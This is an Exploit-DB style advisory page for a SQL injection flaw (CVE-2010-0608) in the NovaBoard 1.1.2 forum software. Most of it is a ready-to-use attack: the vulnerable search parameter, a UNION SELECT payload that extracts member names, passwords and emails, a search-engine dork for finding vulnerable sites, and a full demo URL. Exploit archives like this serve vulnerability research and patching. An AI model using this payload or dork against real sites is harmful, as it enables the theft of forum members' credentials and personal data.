ad

NovaBoard 1.1.2 - SQL Injection Vulnerability



EDB-ID: 11278 CVE: 2010-0608 OSVDB-ID: 62002
Author: Delibey Published: 2010-01-28 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
############################################################# 
# NovaBoard v1.1.2 SQL Injection Vulnerability 
  
# Plugin Home: http://www.novaboard.net/ 
  
# Author: Delibey 
  
# Site: www.1923turk.com 
 
############################################################## 
  
  
# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
                                    
  
   
# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj] 
  
  
#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
             
#  Dork  : "Powered by NovaBoard v1.1.2"           
  
# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
  
   
############################################################## 
# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################